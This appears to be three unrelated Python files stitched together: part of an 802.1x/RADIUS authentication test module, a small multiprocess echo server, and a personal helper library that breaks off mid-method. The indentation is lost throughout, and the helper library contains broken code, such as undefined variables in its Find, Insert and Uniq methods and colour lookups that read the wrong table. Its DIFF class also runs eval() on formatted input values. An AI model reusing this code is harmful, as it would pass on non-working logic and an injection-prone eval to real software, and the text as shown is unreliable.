with open(self._config_file, 'r') as file_stream:
full_config = json.load(file_stream)
config = full_config.get('modules').get('dot1x')
self._debug = config.get('debug')
if self._debug:
utils.enable_debug_logs(self.logger)
self.logger.debug('Loaded config from %s:\n %s', self._config_file, config)
self._interface = config.get('interface', utils.get_interface_name())
radius_config = config.get('radius_server', {})
radius_socket_info = radius_config.get('radius_socket_info', {})
listen_ip = radius_socket_info.get('listen_ip', utils.get_interface_ip(self._interface))
listen_port = radius_socket_info.get('listen_port', 0)
remote_ip = radius_socket_info.get('remote_ip', '127.0.0.1')
remote_port = radius_socket_info.get('remote_port', self.RADIUS_PORT)
self._radius_socket_info = RadiusSocketInfo(listen_ip, listen_port, remote_ip, remote_port)
self._radius_secret = radius_config.get('secret', 'SECRET')
self._radius_id = radius_config.get('id', utils.get_interface_mac(self._interface))
def _setup(self):
self._load_config()
self.radius_module = RadiusModule(
self._radius_socket_info, self._radius_secret,
self._radius_id, self.received_radius_response)
self.eap_module = EapModule(self._interface, self.received_eap_request)
if self._debug:
utils.enable_debug_logs(self.radius_module.logger)
utils.enable_debug_logs(self.eap_module.logger)
# TODO: Take value from config and then revert to default
interval = self.HEARTBEAT_INTERVAL
# TODO: Take value from config and then revert to default
self._idle_time = self.IDLE_TIME
self._max_retry_count = self.RETRY_COUNT
self.sm_timer = HeartbeatScheduler(interval)
self.sm_timer.add_callback(self.handle_sm_timeout)
self._current_timeout = time.time() + self.EAPOL_IDLE_TIME
def start_threads(self):
self.logger.info('Starting SM timer')
self.sm_timer.start()
self.logger.info('Listening for EAP and RADIUS.')
def build_thread(method):
self._threads.append(threading.Thread(target=method))
build_thread(self.radius_module.receive_radius_messages)
build_thread(self.radius_module.send_radius_messages)
build_thread(self.eap_module.receive_eap_messages)
build_thread(self.eap_module.send_eap_messages)
for thread in self._threads:
thread.start()
for thread in self._threads:
thread.join()
self.logger.info('Done listening for EAP and RADIUS packets.')
def _end_authentication(self):
self.logger.info('Stopping timer')
if self.sm_timer:
self.sm_timer.stop()
self.logger.info('Shutting down modules.')
self.radius_module.shut_down_module()
self.eap_module.shut_down_module()
def received_eap_request(self, src_mac, eap_message, is_eapol):
if is_eapol:
if not (src_mac in self.state_machines or src_mac in self.results):
self.logger.info('Starting authentication for %s' % (src_mac))
auth_mac = self.eap_module.get_auth_mac()
state_machine = AuthStateMachine(
src_mac, auth_mac,
self._idle_time, self._max_retry_count,
self.send_eap_response, self.send_radius_request,
self.process_test_result)
state_machine.initialize()
self.state_machines[src_mac] = state_machine
state_machine.received_eapol_start()
else:
self.logger.warning(
'Authentication for %s is in progress or has completed' % (src_mac))
else:
state_machine = self.state_machines[src_mac]
state_machine.received_eap_request(eap_message)
def received_radius_response(self, src_mac, radius_attributes, packet_type):
eap_message = radius_attributes.eap_message
radius_state = radius_attributes.state
state_machine = self.state_machines[src_mac]
state_machine.received_radius_response(eap_message, radius_state, packet_type)
def send_eap_response(self, src_mac, message=None):
if not message:
self.eap_module.send_eapol_response(src_mac)
else:
self.eap_module.send_eap_message(src_mac, message)
def send_radius_request(self, radius_packet_info):
self.radius_module.send_radius_packet(radius_packet_info)
def process_test_result(self, src_mac, is_success):
if is_success:
self.logger.info('Authentication successful for %s' % (src_mac))
else:
if src_mac:
self.logger.info('Authentication failed for %s' % (src_mac))
else:
self.logger.info('Authentication failed. Received no EAPOL packets.')
if src_mac:
self.results[src_mac] = is_success
if self.state_machines[src_mac].radius_access_reject:
self.radius_access_reject[src_mac] = True
self.state_machines.pop(src_mac)
# TODO: We currently finalize results as soon as we get a result for a src_mac.
# Needs to be changed if we support multiple devices.
self._end_authentication()
def run_authentication_test(self):
self.start_threads()
result_str = ""
test_result = ""
self.logger.info('Auth results %s' % self.results)
self.logger.info('Auth rejects %s' % self.radius_access_reject)
if not self.results:
result_str = "Authentication failed. No EAPOL messages received."
result_str = result_str + " Check 802.1x is enabled"
test_result = "skip"
else:
test_result = "pass"
for src_mac, is_success in self.results.items():
self.logger.info('Auth check %s %s %s' % (
src_mac, is_success, src_mac in self.radius_access_reject))
additional = ''
if is_success:
result = 'succeeded'
else:
result = 'failed'
test_result = "fail"
if src_mac in self.radius_access_reject:
additional = ' Incorrect credentials provided.'
else:
additional = ' Error encountered.'
result_str += "Authentication %s.%s" % (result, additional)
self.logger.info('Auth result %s %s' % (test_result, result_str))
return result_str, test_result
def handle_sm_timeout(self):
if not self.state_machines and self._current_timeout:
if time.time() > self._current_timeout:
self.process_test_result(None, False)
else:
# Convert to list to prevent concurrent modification issues.
for state_machine in list(self.state_machines.values()):
state_machine.handle_timer()
def main():
authenticator = Authenticator()
print(authenticator.run_authentication_test())
if __name__ == '__main__':
main()
|
multi_echo_server.py
|
#!/usr/bin/env python3
import socket
import time
from multiprocessing import Process
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
def main():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(2)
while True:
conn, addr = s.accept()
p = Process(target=handle_echo, args=(addr, conn))
p.daemon = True
p.start()
print("Started process ", p)
def handle_echo(addr, conn):
print("Connected by", addr)
full_data = b""
while True:
data = conn.recv(BUFFER_SIZE)
if not data: break
full_data += data
time.sleep(0.5)
conn.sendall(full_data)
conn.shutdown(socket.SHUT_RDWR)
if __name__ == "__main__":
main()
|
__init__.py
|
#!/bin/python
# -*- coding: utf-8 -*-
# Kage personal stuff
#
from __future__ import print_function
import os
import re
import sys
import ast
import ssl
import stat
import time
import uuid
import smtplib
import tarfile
import zipfile
import random
import struct
import string
import fnmatch
import pickle
import tarfile
import zipfile
import pickle
import random
import inspect
import base64
import hashlib
import importlib
import subprocess
import traceback
import fcntl,socket,struct
import json as _json
import email.utils
import xml.etree.ElementTree as ET
from sys import modules
from sys import path as mod_path
from sys import version_info
from pprint import pprint
from threading import Thread
from datetime import datetime
from email import encoders
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from multiprocessing import Process, Queue
from distutils.spawn import find_executable
from distutils.version import LooseVersion
from kmisc.Import import *
Import('from lz4 import frame')
Import('import bz2')
Import('import magic')
from http.cookies import Morsel # This module for requests when you use build by pyinstaller command
Import('import requests')
url_group = re.compile('^(https|http|ftp)://([^/\r\n]+)(/[^\r\n]*)?')
#log_file=None
log_intro=3
log_new_line='\n'
pipe_file=None
cdrom_ko=['sr_mod','cdrom','libata','ata_piix','ata_generic','usb-storage']
def Global():
return dict(inspect.getmembers(inspect.stack()[-1][0]))["f_globals"]
def OutFormat(data,out=None):
if out in [tuple,'tuple']:
if not isinstance(data,tuple):
return (data,)
elif not isinstance(data,list):
return tuple(data)
elif out in [list,'list']:
if not isinstance(data,list):
return [data]
elif not isinstance(data,tuple):
return list(data)
elif out in ['raw',None]:
if isinstance(data,(list,tuple)) and len(data) == 1:
return data[0]
elif isinstance(data,dict) and len(data) == 1:
return data.values()[0]
elif out in ['str',str]:
return '''{}'''.format(data)
elif out in ['int',int]:
try:
return int(data)
except:
pass
return data
def Abs(*inps,**opts):
default=opts.get('default',None)
out=opts.get('out','auto')
obj=opts.get('obj',None)
err=opts.get('err',True)
def int_idx(idx,nobj,default,err,out='auto'):
if idx < 0:
if abs(idx) <= nobj:
if out in ['list',list]:
return [nobj+idx]
elif out in ['tuple',tuple]:
return (nobj+idx,)
return nobj+idx
elif err not in [True,'err','True']:
return 0
else:
if nobj > idx:
if out in ['list',list]:
return [idx]
elif out in ['tuple',tuple]:
return (idx,)
return idx
elif err not in [True,'err','True']:
return nobj-1
return default
if len(inps) > 0:
ss=None
ee=None
rt=[]
if obj is None:
for i in inps:
if isinstance(i,int):
rt.append(abs(i))
elif err in [True,'err','True']:
rt.append(default)
# elif isinstance(obj,dict):
# keys=list(obj)
# for idx in inps:
# if isinstance(idx,int):
# int_index=int_idx(idx,len(keys),default,err)
# if int_index != default: rt.append(keys[int_index])
# elif isinstance(idx,tuple) and len(idx) == 2:
# ss=Abs(idx[0],**opts)
# ee=Abs(idx[1],**opts)
# for i in range(ss,ee+1):
# rt.append(keys[i])
# elif isinstance(idx,str):
# try:
# idx=int(idx)
# rt.append(int_idx(idx,len(keys),default,err))
# except:
# if len(idx.split(':')) == 2:
# ss,ee=tuple(idx.split(':'))
# if isinstance(ss,int) and isinstance(ee,int):
# for i in range(ss,ee+1):
# rt.append(keys[i])
# elif len(idx.split('-')) == 2:
# ss,ee=tuple(idx.split('-'))
# if isinstance(ss,int) and isinstance(ee,int):
# for i in range(ss,ee+1):
# rt.append(keys[i])
# elif len(idx.split('|')) > 1:
# rt=rt+idx.split('|')
elif isinstance(obj,(list,tuple,str)):
nobj=len(obj)
for idx in inps:
if isinstance(idx,list):
for ii in idx:
if isinstance(ii,int):
if nobj > ii:
rt.append(ii)
else:
rt.append(OutFormat(default))
elif isinstance(idx,int):
rt.append(int_idx(idx,nobj,default,err))
elif isinstance(idx,tuple) and len(idx) == 2:
ss=Abs(idx[0],**opts)
ee=Abs(idx[1],**opts)
rt=rt+list(range(ss,ee+1))
elif isinstance(idx,str):
try:
idx=int(idx)
rt.append(int_idx(idx,nobj,default,err))
except:
if len(idx.split(':')) == 2:
ss,ee=tuple(idx.split(':'))
ss=Abs(ss,**opts)
ee=Abs(ee,**opts)
if isinstance(ss,int) and isinstance(ee,int):
rt=rt+list(range(ss,ee+1))
elif len(idx.split('-')) == 2:
ss,ee=tuple(idx.split('-'))
ss=Abs(ss,**opts)
ee=Abs(ee,**opts)
if isinstance(ss,int) and isinstance(ee,int):
rt=rt+list(range(ss,ee+1))
elif len(idx.split('|')) > 1:
for i in idx.split('|'):
ss=Abs(i,obj=obj,out='raw')
if isinstance(ss,int):
rt.append(ss)
else:
rt.append(OutFormat(default))
return OutFormat(rt,out=out)
elif obj:
if isinstance(obj,(list,tuple,str)):
return len(obj)
elif isinstance(obj,dict):
return list(obj.keys())
return default
def ObjName(obj,default=None):
if isinstance(obj,str):
if os.path.isfile(obj):
aa=magic.from_buffer(open(obj,'rb').read(2048))
if aa: return aa.split()[0].lower()
try:
with open(obj,'rb') as f: # Pickle Type
pickle.load(f)
return 'pickle'
except:
pass
return 'str'
else:
obj_dir=dir(obj)
obj_name=type(obj).__name__
if obj_name in ['function']: return obj_name
if '__dict__' in obj_dir:
if obj_name == 'type': return 'classobj'
return 'instance'
# elif obj_name == 'type':
# return obj.__name__
return obj_name.lower() # Object Name
return default
#def TypeFixer(name,default=None):
def TypeFixer(obj,default='unknown'):
if obj == default: return default
if isinstance(obj,str):
name=obj.lower()
else:
name=ObjName(obj).lower()
# Fix short word to correct name
if name in ['none']: return 'nonetype'
if name in ['byte']: return 'bytes'
if name in ['obj']: return 'object'
if name in ['func','unboundmethod']: return 'function'
if name in ['class']: return 'classobj'
if name in ['yield']: return 'generator'
if name in ['builtinfunction','builtinmethod','builtin_function_or_method']: return 'builtin_function_or_method'
# function: function and instance's function in Python3
# method: class's function in Python3
# instancemethod: instance's and class's function in Python2
if name in ['method','classfunction','instancemethod','unboundmethod']: return 'method' # function in the class
# it changed name between python versions, so return both name for this name
if name in ['dictproxy','mappingproxy']: return ['dictproxy','mappingproxy'] # function in the class
# Fix python version for long
if name in ['long']:
if sys.version_info[0] < 3: return name
return 'int'
if not isinstance(obj,str) and name == 'type':
return obj.__name__.lower()
# return original name
return name
def Type(*inp,**opts):
'''
instance: <class name>()
classobj : <class name>
function : <func name>
return value: <func name>()
method : <class name>().<func name>
'''
inpn=len(inp)
default=opts.get('default','unknown')
if inpn == 0: return default
obj=inp[0]
if inpn == 1: return TypeFixer(obj,default=default)
chk_type=[]
for name in inp[1:]:
if not isinstance(name,(tuple,list)): name=[name]
for ii in name:
a=TypeFixer(TypeFixer(ii,default=default),default=default)
if a == default: continue
if isinstance(a,list):
chk_type=chk_type+a
elif a not in chk_type:
chk_type.append(a)
if chk_type:
obj_type=ObjName(obj)
# print(' ::',obj_type,' in ',chk_type)
if obj_type == default: return default
if obj_type == 'instance':
if 'int' in chk_type:
if isinstance(obj,int): return True
elif 'dict' in chk_type:
if isinstance(obj,dict): return True
elif 'list' in chk_type:
if isinstance(obj,list): return True
elif 'tuple' in chk_type:
if isinstance(obj,tuple): return True
elif 'float' in chk_type:
if isinstance(obj,float): return True
if obj_type in chk_type: return True
return False
def Copy(src):
if isinstance(src,(list,tuple)): return src.root[:]
if isinstance(src,dict): return src.copy()
if isinstance(src,str): return '{}'.format(src)
if isinstance(src,int): return int('{}'.format(src))
if isinstance(src,float): return float('{}'.format(src))
if PyVer(2):
if isinstance(src,long): return long('{}'.format(src))
class COLOR:
def __init__(self,**opts):
self.color_db=opts.get('color',{'blue': 34, 'grey': 30, 'yellow': 33, 'green': 32, 'cyan': 36, 'magenta': 35, 'white': 37, 'red': 31})
self.bg_color_db=opts.get('bg',{'cyan': 46, 'white': 47, 'grey': 40, 'yellow': 43, 'blue': 44, 'magenta': 45, 'red': 41, 'green': 42})
self.attr_db=opts.get('attr',{'reverse': 7, 'blink': 5,'concealed': 8, 'underline': 4, 'bold': 1})
def Color_code(self,name,default=None):
return self.color_db.get(name,default)
def Background_code(self,name,default=None):
return self.color_db.get(name,default)
def Attr_code(self,name,default=None):
return self.color_db.get(name,default)
def Get(self,color,mode='color',default=None):
color_code=None
if mode == 'color':
color_code=self.Color_code(color,default=default)
elif mode in ['background','bg']:
color_code=self.Background_code(color,default=default)
elif mode in ['attr','attribute']:
color_code=self.Attr_code(color,default=default)
return color_code
def String(self,msg,color,bg=False,attr=False,mode='shell'):
if mode in ['html','HTML']:
if bg:
return '''<p style="background-color: {}">{}</p>'''.format(format(color,msg))
else:
return '''<font color={}>{}</font>'''.format(color,msg)
else:
if bg:
color_code=self.Get(color,mode='bg',default=None)
elif attr:
color_code=self.Get(color,mode='attr',default=None)
else:
color_code=self.Get(color,default=None)
if color_code is None:
return msg
if os.getenv('ANSI_COLORS_DISABLED') is None:
reset='''\033[0m'''
fmt_msg='''\033[%dm%s'''
msg=fmt_msg % (color_code,msg)
return msg+reset
class FIND:
def __init__(self,string,out='index',word=False):
string=string.replace('*','.+').replace('?','.')
if word:
self.find_re=re.compile(r'\b({0})\b'.format(string),flags=re.IGNORECASE)
else:
self.find_re=re.compile(string,flags=re.IGNORECASE)
self.out=out
def From(self,data,symbol='\n'):
rt=[]
def Search(data,key,rt):
found=self.find_re.findall(data)
if found:
if self.out in ['found']:
rt=rt+found
elif self.out in ['index','idx','key']:
rt.append(key)
elif self.out in ['all','*']:
rt.append((key,data))
else:
rt.append(data)
return rt
if Type(data,str):
data=data.split(symbol)
if Type(data,list,tuple):
for i in range(0,len(data)):
if Type(data[i],(list,tuple,dict)):
sub=self.From(data[i],symbol=symbol)
if sub:
if self.out in ['key','index','idx']:
for z in sub:
rt.append('{}/{}'.format(i,z))
else:
rt=rt+sub
elif Type(data[i],str):
rt=Search(data[i],i,rt)
elif Type(data,dict):
for i in data:
if Type(data[i],(list,tuple,dict)):
sub=self.From(data[i],symbol=symbol)
if sub:
if self.out in ['key','index','idx']:
for z in sub:
rt.append('{}/{}'.format(i,z))
else:
rt=rt+sub
elif Type(data[i],str):
rt=Search(data[i],i,rt)
else:
return 'Unknown format'
return rt
def Find(self,src,find,prs=None,sym='\n',pattern=True,default=[],out=None,findall=False,word=False,mode='value'):
#if Type(src,'instance','classobj'):
# if src is instance or classobj then search in description and made function name at key
if isinstance(src,(list,tuple)):
rt=[]
for i in range(0,len(self.root)):
for j in inps:
j=j.replace('*','.+').replace('?','.')
mm=re.compile(j)
if bool(re.match(mm,self.root[i])):
if mode in ['index','idx']:
rt.append(i)
else:
rt.append(src[i])
if len(rt):
return rt
elif isinstance(src,dict):
path=[]
for key in src:
if mode in ['key','*','all']: # find in key only
if find == key:
path.append(key)
found=src.get(key,None)
if isinstance(found,dict):
if dep in found:
if mode in ['value','*','all'] and (find == found[dep] or (type(found[dep]) in [DICT,dict,list,tuple] and find in found[dep]) or (type(find) is str and type(found[dep]) is str and find in found[dep])): # find in 'find' only
# Value find
path.append(key)
elif isinstance(found[dep], dict): # recursing
path=path+Find(found[dep],find,proper=proper,mode=mode)
else:
if mode in ['value','*','all'] and find == found or (type(found) in [list,tuple] and find in found) or (type(find) is str and type(found) is str and find in found):
path.append(key)
else:
for kk in Find(src[key],find,proper=proper,mode=mode): # recursing
path.append(key+'/'+kk)
else:
if mode in ['value','*','all'] and find == found or (type(found) in [list,tuple] and find in found) or (type(find) is str and type(found) is str and find in found):
path.append(key)
return path
elif isinstance(src,str):
if word:
find_re=re.compile(r'\b({0})\b'.format(find),flags=re.IGNORECASE)
else:
find_re=re.compile(find,flags=re.IGNORECASE)
if findall:
match=find_re.findall(src)
if match: return OutFormat(match,out=out)
else:
match=find_re.search(src)
if match: return OutFormat([match.group()],out=out)
return OutFormat(default,out=out)
class DIFF:
def __init__(self):
pass
def Data(self,a,sym,b,ignore=None,default=None):
if isinstance(ignore,(list,tuple)):
if a in ignore or b in ignore:
return default
elif ignore is not None:
if eval('{} == {}'.format(a,ignore)) or eval('{} == {}'.format(b,ignore)):
return default
if sym == '==':
try:
return eval('{} == {}'.format(a,b))
except:
return default
elif isinstance(a,int) and isinstance(b,int):
try:
return eval('{} {} {}'.format(a,sym,b))
except:
return default
elif isinstance(a,str) and isinstance(b,str) and a.isdigit() and b.isdigit():
try:
return eval('{} {} {}'.format(a,sym,b))
except:
return default
return default
def Code(self):
pass
def File(self):
pass
class LIST(list):
def __init__(self,*inps):
if len(inps) == 1 and isinstance(inps[0],(list,tuple)):
self.root=list(inps[0])
else:
self.root=list(inps)
# def __new__(cls,*inps):
# if len(inps) == 1 and isinstance(inps[0],(list,tuple)):
# return list(inps[0])
# else:
# return list(inps)
# reply self.root back to the Class's output a=List(['a']), return the data to a
def __repr__(self):
return repr(self.root)
def Convert(self,src,path=False,default=False,symbol=':white_space:',**opts):
if isinstance(src,str) and src:
if path and isinstance(symbol,str):
if symbol == ':white_space:':
symbol='/'
start=0
if src[0] == symbol:
start=1
if src[-1] == symbol:
return src.split(symbol)[start:-1]
return src.split(symbol)[start:]
else:
if symbol == ':white_space:':
return src.strip().split()
elif isinstance(symbol,str):
return src.split(symbol)
elif isinstance(symbol,(tuple,list)):
regexPattern = '|'.join(map(re.escape,tuple(symbol)))
return re.split(regexPattern,src)
return default
elif isinstance(src,(list,tuple)):
return list(src)
else:
return [src]
def Append(self,*inps,**opts):
uniq=opts.get('uniq',False)
symbol=opts.get('symbol',':white_space:')
path=opts.get('path',False)
default=opts.get('default',False)
for pp in inps:
for rp in self.Convert(pp,symbol=symbol,path=path,default=default):
if rp == default: continue
if uniq and rp in self.root: continue
if path:
if rp == '.': continue
if rp == '..' and len(self.root):
del self.root[-1]
continue
self.root.append(rp)
return self.root
def append(self,inp):
self.root.append(inp)
def Uniq(self,*inps,**opts):
symbol=opts.get('symbol',':white_space:')
path=opts.get('path',False)
default=opts.get('default',False)
for pp in self.root + list(inps):
for rp in self.Convert(pp,symbol=symbol,path=path,default=default):
if rp == default: continue
if rp in rt: continue
if path:
if rp == '.': continue
if rp == '..' and len(rt):
del self.root[-1]
continue
self.root.append(rp)
return self.root
def Delete(self,*inps,**opts):
find=opts.get('find','index')
default=opts.get('default',False)
if find in ['data','element']:
for i in inps:
if i in self.root:
self.root.remove(i)
else:
if len(inps) == 1 and isinstance(inps[0],int):
if len(self.root) > inps[0]:
del self.root[inps[0]]
else:
rt=[]
del_list=Abs(*inps,obj=self.root,out=list)
for i in range(0,len(self.root)):
if i in del_list: continue
rt.append(self.root[i])
self.root=rt
def Get(self,*inps,**opts):
if not inps: return self.root
find=opts.get('find','data')
default=opts.get('default',None)
out=opts.get('out',list)
err=opts.get('err',False)
if len(self.root) == 0 and err:
return default
rt=[]
if find in ['index','idx']:
for i in inps:
if i in self.root:
rt.append(self.root.index(i))
elif err is True:
rt.append(default)
else:
for i in Abs(*inps,obj=self.root,err=err,out=list,default=None):
if isinstance(i,int) and self.root:
rt.append(self.root[i])
elif err is True:
return default
if rt:
if out in [list,'list']:
return rt
elif out in [tuple,'tuple']:
return tuple(rt)
elif out in [None,'raw']:
if len(rt) == 1:
return rt[0]
return rt
return default
def Index(self,*inps):
return self.Get(*inps,find='index')
def Insert(self,*inps,**opts):
start=opts.get('at',0)
default=opts.get('default',False)
err=opts.get('err',False)
if isinstance(at,str):
if at in ['start','first']: self.root=list(inps)+self.root
if at in ['end','last']: self.root=self.root+list(inps)
elif len(self.root) == 0:
self.root=list(inps)
elif isinstance(start,int) and len(self.root) > start:
self.root=self.root[:start]+list(inps)+self.root[start:]
else:
if err:
return default
self.root=self.root+list(inps)
def Update(self,*inps,**opts):
at=opts.get('at',0)
err=opts.get('err',False)
default=opts.get('default',False)
n=len(self.root)
if n == 0:
if err is True:
return default
else:
self.root=list(inps)
elif isinstance(at,int) and n > at:
for i in range(0,len(inps)):
if n > at+i:
self.root[at+i]=inps[i]
elif err is True:
return default
else:
self.root=self.root+list(inps)[i:]
break
elif isinstance(at,(tuple,list)):
if len(inps) == len(at):
for i in range(0,len(at)):
if isinstance(at[i],int) and n > at[i]:
self.root[at[i]]=inps[i]
elif err is True:
return default
else:
self.root.append(inps[i])
def Find(self,*inps,**opts):
find=opts.get('find','index')
default=opts.get('default',[])
rt=[]
for i in range(0,len(self.root)):
for j in inps:
j=j.replace('*','.+').replace('?','.')
mm=re.compile(j)
if bool(re.match(mm,self.root[i])):
if find in ['index','idx']:
rt.append(i)
else:
rt.append(self.root[i])
if len(rt):
return rt
return default
def Copy(self):
return self.root[:]
def copy(self):
return self.root[:]
def Tuple(self):
return tuple(self.root)
def Move2first(self,find):
if isinstance(find,(list,tuple)):
self.Delete(*find,find='data')
self.root=list(find)+self.root
else:
self.Delete(*(find,),find='data')
self.root=[find]+self.root
return self.root
def Move2end(self,find):
if isinstance(find,(list,tuple)):
self.Delete(*find,find='data')
self.root=self.root+list(find)
else:
self.Delete(*(find,),find='data')
self.root=self.root+[find]
return self.root
def Sort(self,reverse=False,func=None,order=None,field=None):
if order in [int,'int','digit','number']:
def _cint_(e):
try:
if isinstance(field,int):
if isinstance(e,(list,tuple)) and len(e) > field:
return int(e[field])
else:
return 9999999
return int(e)
except:
return e
return self.root.sort(reverse=reverse,key=_cint_)
elif order in [str,'str']:
def _cint_(e):
if isinstance(field,int):
if isinstance(e,(list,tuple)) and len(e) > field:
return '''{}'''.format(e[field])
else:
return 'zzzzzzzzz'
return '''{}'''.format(e)
return self.root.sort(reverse=reverse,key=_cint_)
else:
if isinstance(field,int):
def _cint_(e):
if isinstance(e,(list,tuple)) and len(e) > field:
return e[field]
return self.root.sort(reverse=reverse,key=_cint_)
else:
return self.root.sort(reverse=reverse,key=func)
def Str(self,sym=' ',default=None):
if isinstance(self.src,(tuple,list)):
rt_str=''
for ii in self.src:
if rt_str:
rt_str='''{}{}{}'''.format(rt_str,sym,ii)
else:
rt_str='''{}'''.format(ii)
self.src=rt_str
return rt_str
return default
class STR(str):
def __init__(self,src):
self.src=src
def Rand(self,length=8,strs=None,mode='*'):
return Random(length=length,strs=strs,mode=mode)
def Cut(self,head_len=None,body_len=None,new_line='\n',out=str):
if not isinstance(self.src,str):
self.src='''{}'''.format(self.src)
source=self.src.split(new_line)
if len(source) == 1 and not head_len or head_len >= len(self.src):
return [self.src]
rt=[]
for src_idx in range(0,len(source)):
str_len=len(source[src_idx])
if not body_len:
rt=rt+[source[src_idx][i:i + head_len] for i in range(0, str_len, head_len)]
else:
if src_idx == 0:
rt.append(source[src_idx][0:head_len]) # Take head
if str_len > head_len:
rt=rt+[source[src_idx][head_len:][i:i + body_len] for i in range(0, str_len-head_len, body_len)]
## Cut body
#string_tmp=self.src[head_len:]
#string_tmp_len=len(string_tmp)
#for i in range(0, int(string_tmp_len/body_len)+1):
# if (i+1)*body_len > string_tmp_len:
# rt.append(string_tmp[body_len*i:])
# else:
# rt.append(string_tmp[body_len*i:(i+1)*body_len])
else:
rt=rt+[source[src_idx][i:i + body_len] for i in range(0, str_len, body_len)]
if rt and out in ['str',str]: return new_line.join(rt)
return rt
def Space(num=1,fill=' ',mode='space'):
if mode.lower() =='tap':
fill='\t'
tap=''
for i in range(0,num):
tap=tap+fill
return tap
def Tap(self,space='',sym='\n',default=None,NFLT=False,out=str):
# No First Line Tap (NFLT)
if isinstance(space,int):
space=self.Space(space)
if isinstance(self.src,str):
self.src=self.src.split(sym)
if isinstance(self.src,(list,tuple)):
rt=[]
if NFLT:
rt.append(self.src.pop(0))
for ii in self.src:
rt.append('%s%s'%(space,ii))
if rt and out in [str,'str']: return sym.join(rt)
return rt
return default
def Wrap(self,src=None,space='',space_mode='space',sym='\n',default=None,NFLT=False,out=str):
if src is None: src=self.src
if not isinstance(src,(str,list,tuple)): return src
if isinstance(src,str): src=src.split(sym)
if isinstance(space,int): space=self.Space(space,mode=space_mode)
rt=[]
# No First Line Tap (NFLT)
if NFLT: rt.append('%s'%(src.pop(0)))
for ii in src:
rt.append('%s%s'%(space,ii))
if rt and out in [str,'str']: return sym.join(rt)
return rt
def Reduce(self,start=0,end=None,sym=None,default=None):
if isinstance(self.src,str):
if sym:
arr=self.src.split(sym)
if isinstance(end,int):
return sym.join(arr[start:end])
else:
return sym.join(arr[start])
else:
if isinstance(end,int):
return self.src[start:end]
else:
return self.src[start:]
return default
def Find(self,find,src=None,prs=None,sym='\n',pattern=True,default=[],out=None,findall=False,word=False):
if src is None: src=self.src
return FIND().Find(src,find,prs=prs,sym=sym,pattern=pattern,default=default,out=out,findall=findall,word=word,mode='value')
def Index(self,find,start=None,end=None,sym='\n',default=[],word=False,pattern=False,findall=False,out=None):
if not isinstance(self.src,str): return default
rt=[]
source=self.src.split(sym)
for row in range(0,len(source)):
for ff in self.Find(find,src=source[row],pattern=pattern,word=word,findall=findall,default=[],out=list):
if findall:
rt=rt+[(row,[m.start() for m in re.finditer(ff,source[row])])]
else:
idx=source[row].index(ff,start,end)
if idx >= 0:
rt.append((row,idx))
if rt:
if out in ['tuple',tuple]: return tuple(rt)
if out not in ['list',list] and len(rt) == 1 and rt[0][0] == 0:
if len(rt[0][1]) == 1:return rt[0][1][0]
return rt[0][1]
return rt
return default
def Replace(self,replace_what,replace_to,default=None):
if isinstance(self.src,str):
if replace_what[-1] == '$' or replace_what[0] == '^':
return re.sub(replace_what, replace_to, self.src)
else:
head, _sep, tail = self.src.rpartition(replace_what)
return head + replace_to + tail
return default
def Split(self,sym,src=None,default=None):
if not isinstance(sym,str): return default
if src is None: src=self.src
if isinstance(src,str):
if isinstance(sym,bytes): sym=CONVERT(sym).Str()
elif isinstance(src,bytes):
if isinstance(sym,str): sym=BYTES().From(sym,default={'org'})
else:
return src
if len(sym) > 2 and '|' in sym:
try:
sym_a=sym.split('|')
for i in ['.','+','*']:
try:
x=sym_a.index(i)
sym_a[x]='\{}'.format(sym_a[x])
except:
continue
return re.split('|'.join(sym_a),src) # splited by '|' or expression
except:
pass
return src.split(sym)
# def Split(self,sym=None):
# if isinstance(self.src,str):
# try:
# return re.split(sym,self.src) # splited by '|' or expression
# except:
# return self.src.split(sym)
class TIME:
def __init__(self):
self.init_sec=int(datetime.now().strftime('%s'))
def Reset(self):
self.init_sec=int(datetime.now().strftime('%s'))
def Sleep(self,try_wait=None,default=1):
if isinstance(try_wait,(int,str)): try_wait=(try_wait,)
if isinstance(try_wait,(list,tuple)) and len(try_wait):
if len(try_wait) == 2:
try:
time.sleep(random.randint(int(try_wait[0]),int(try_wait[1])))
except:
pass
else:
try:
time.sleep(int(try_wait[0]))
except:
pass
else:
time.sleep(default)
def Rand(self,try_wait=None,default=1):
if isinstance(try_wait,(int,str)): try_wait=(try_wait,)
if isinstance(try_wait,(list,tuple)) and len(try_wait):
if len(try_wait) == 2:
try:
return random.randint(int(try_wait[0]),int(try_wait[1]))
except:
pass
else:
try:
return int(try_wait[0])
except:
pass
return default
def Int(self):
return int(datetime.now().strftime('%s'))
def Now(self,mode=None):
if mode in [int,'int','INT','sec']:return self.Int()
return time.now()
def Out(self,timeout_sec,default=(24*3600)):
try:
timeout_sec=int(timeout_sec)
except:
timeout_sec=default
if timeout_sec == 0:
return False
if self.Int() - self.init_sec > timeout_sec:
return True
return False
def Format(self,time=0,tformat='%s',read_format='%S'):
if time in [0,'0',None]:
return datetime.now().strftime(tformat)
elif isinstance(time,int) or (isinstance(time,str) and time.isdigit()):
#if type(time) is int or (type(time) is str and time.isdigit()):
if read_format == '%S':
return datetime.fromtimestamp(int(time)).strftime(tformat)
else:
return datetime.strptime(str(time),read_format).strftime(tformat)
def Init(self):
return self.init_sec
def Time(self):
return time.time()
def Datetime(self):
return datetime()
class SHELL:
def __init__(self):
pass
def Pprog(self,stop,progress_pre_new_line=False,progress_post_new_line=False,log=None,progress_interval=5):
TIME().Sleep(progress_interval)
if stop():
return
if progress_pre_new_line:
if log:
log('\n',direct=True,log_level=1)
else:
sys.stdout.write('\n')
sys.stdout.flush()
post_chk=False
while True:
if stop():
break
if log:
log('>',direct=True,log_level=1)
else:
sys.stdout.write('>')
sys.stdout.flush()
post_chk=True
TIME().Sleep(progress_interval)
if post_chk and progress_post_new_line:
if log:
log('\n',direct=True,log_level=1)
else:
sys.stdout.write('\n')
sys.stdout.flush()
def Run(self,cmd,timeout=None,ansi=True,path=None,progress=False,progress_pre_new_line=False,progress_post_new_line=False,log=None,progress_interval=5):
start_time=TIME()
if not isinstance(cmd,str):
return -1,'wrong command information :{0}'.format(cmd),'',start_time.Init(),start_time.Init(),start_time.Now(int),cmd,path
Popen=subprocess.Popen
PIPE=subprocess.PIPE
cmd_env=''
cmd_a=cmd.split()
cmd_file=cmd_a[0]
